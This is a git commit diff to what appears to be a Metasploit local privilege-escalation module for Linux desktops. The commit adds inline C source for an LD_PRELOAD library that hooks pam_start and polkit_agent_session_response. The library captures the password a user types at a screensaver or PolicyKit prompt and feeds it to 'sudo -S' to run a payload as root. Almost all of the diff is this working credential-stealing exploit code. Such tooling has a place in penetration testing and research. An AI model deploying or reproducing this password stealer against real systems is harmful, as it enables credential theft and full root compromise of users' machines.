Converted LD_PRELOAD library from precompiled binary to metasm code.

jakoblell · jakoblell · commit 3e57ac838c7a · 2014-09-04T21:49:55.000+02:00
diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb
@@ -7,6 +7,7 @@
 require 'rex'
 require 'msf/core/exploit/exe'
 require 'base64'
+require 'metasm'
 
 class Metasploit4 < Msf::Exploit::Local
   Rank = ExcellentRanking
@@ -63,7 +64,7 @@ def get_restart_commands
       if m
         pid = m[1]
         vprint_status("PID=#{pid}")
-        print_status("EXE_LINE:" + lines[i+1])
+        print_status("Found process: " + lines[i+1])
         exe = lines[i+1].match(/^EXE:(\S+)$/)[1]
         vprint_status("exe=#{exe}")
         cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack("H*").split("\x00")
@@ -84,13 +85,83 @@ def exploit
     write_file(exe_file, generate_payload_exe())
     cmd_exec "chmod +x #{exe_file}"
     lib_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.so"
+    c = %Q|
+// A few constants/function definitions/structs copied from header files
+#define RTLD_NEXT      ((void *) -1l)
+extern uintptr_t dlsym(uintptr_t, char*);
+// Define some structs to void so that we can ignore all dependencies from these structs
+#define FILE void
+#define pam_handle_t void
+extern FILE *popen(const char *command, const char *type);
+extern int pclose(FILE *stream);
+extern int fprintf(FILE *stream, const char *format, ...);
+extern char *strstr(const char *haystack, const char *needle);
+extern void *malloc(unsigned int size);
+
+struct pam_message {
+  int msg_style;
+  const char *msg;
+ };
+struct pam_response {
+  char *resp;
+  int resp_retcode;
+};
+struct pam_conv {
+  int (*conv)(int num_msg, const struct pam_message **msg,
+  struct pam_response **resp, void *appdata_ptr);
+  void *appdata_ptr;
+};
+
+void run_sudo(char* password){
+  FILE* sudo = popen("sudo -S #{exe_file}","w");
+  fprintf(sudo,"%s\\n",password);
+  pclose(sudo);
+}
+
+int my_conv(int num_msg, const struct pam_message **msg, struct pam_response **resp, void *appdata_ptr){
+  struct pam_conv *orig_pam_conversation = (struct pam_conv *)appdata_ptr;
+  int i;
+  int passwd_index = -1;
+  for(i=0;i<num_msg;i++){
+    if(strstr(msg[i]->msg,"Password") >= 0){
+      passwd_index = i;
+    }
+  }
+  int result = orig_pam_conversation->conv(num_msg,msg,resp,orig_pam_conversation->appdata_ptr);
+  if(passwd_index >= 0){
+    run_sudo(resp[passwd_index]->resp);
+  }
+  return result;
+}
+
+int pam_start(const char *service_name, const char *user, const struct pam_conv *pam_conversation, pam_handle_t **pamh) __attribute__((export)){
+  static int (*orig_pam_start)(const char *service_name, const char *user, const struct pam_conv *pam_conversation, pam_handle_t **pamh);
+  if(!orig_pam_start){
+    orig_pam_start = dlsym(RTLD_NEXT,"pam_start");
+  }
+  struct pam_conv *my_pam_conversation = malloc(sizeof(struct pam_conv));
+  my_pam_conversation->conv = &my_conv;
+  my_pam_conversation->appdata_ptr = (struct pam_conv *)pam_conversation;
+  return orig_pam_start(service_name, user, my_pam_conversation, pamh);
+}
+
+void polkit_agent_session_response (void *session, char *response) __attribute__((export)){
+  static void *(*orig_polkit_agent_session_response)(void *session, char* response);
+  if(!orig_polkit_agent_session_response){
+    orig_polkit_agent_session_response = dlsym(RTLD_NEXT,"polkit_agent_session_response");
+  }
+  run_sudo(response);
+  orig_polkit_agent_session_response(session,response);
+  return;
+}
+|
+    cpu = nil
     if target['Arch'] == ARCH_X86
-      lib_path = File.join( Msf::Config.data_directory, "exploits","desktop_linux_privilege_escalation/passwd_stealer_preload32.so")
+      cpu = Metasm::Ia32.new
     elsif target['Arch'] == ARCH_X86_64
-      lib_path = File.join( Msf::Config.data_directory, "exploits","desktop_linux_privilege_escalation/passwd_stealer_preload64.so")
+      cpu = Metasm::X86_64.new
     end
-    lib_data = File.read(lib_path)
-    lib_data["COMMAND_PLACEHOLDER_HERE____________________________________________________________________________________________________"] = exe_file + (" " * ("COMMAND_PLACEHOLDER_HERE____________________________________________________________________________________________________".length-exe_file.length))
+    lib_data = Metasm::ELF.compile_c(cpu, c).encode_string(:lib)
     print_status("Writing lib file to '#{lib_file}'")
     write_file(lib_file,lib_data)
     print_status("Restarting processes (screensaver/policykit)")
